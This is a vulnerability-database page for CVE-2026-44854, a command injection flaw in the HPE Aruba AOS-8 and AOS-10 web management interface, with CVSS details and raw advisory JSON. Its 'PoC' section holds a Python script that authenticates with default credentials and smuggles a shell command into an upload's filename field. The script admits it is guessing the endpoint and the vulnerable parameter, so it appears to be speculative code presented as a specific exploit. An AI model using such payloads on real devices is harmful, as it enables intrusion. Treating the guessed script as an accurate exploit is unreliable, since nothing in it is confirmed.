Security Vulnerability Report
中文
CVE-2026-44854 CVSS 7.2 HIGH

CVE-2026-44854

Published: 2026-05-12 20:16:44
Last Modified: 2026-05-12 20:16:44

Description

Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to upload arbitrary files to the underlying operating system, potentially leading to remote code execution as a privileged user.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba Networking AOS-8 (特定版本)
HPE Aruba Networking AOS-10 (特定版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-44854 import requests # Target configuration target_url = "https://<target-ip>/api/v1/file_upload" # Example endpoint username = "admin" password = "password" # Authenticate session = requests.Session() login_payload = {"username": username, "password": password} session.post(f"https://<target-ip>/login", data=login_payload) # Malicious payload for command injection # Assuming the 'filename' parameter is vulnerable command_payload = "test.txt; touch /tmp/pwned; echo pwned" files = {'file': ('file.txt', 'dummy content')} data = {'filename': command_payload, 'path': '/var/tmp/' } try: response = session.post(target_url, files=files, data=data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if command executed (e.g., file created or reverse shell).") else: print(f"[-] Failed to send payload. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44854", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:44.017", "lastModified": "2026-05-12T20:16:44.017", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to upload arbitrary files to the underlying operating system, potentially leading to remote code execution as a privileged user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}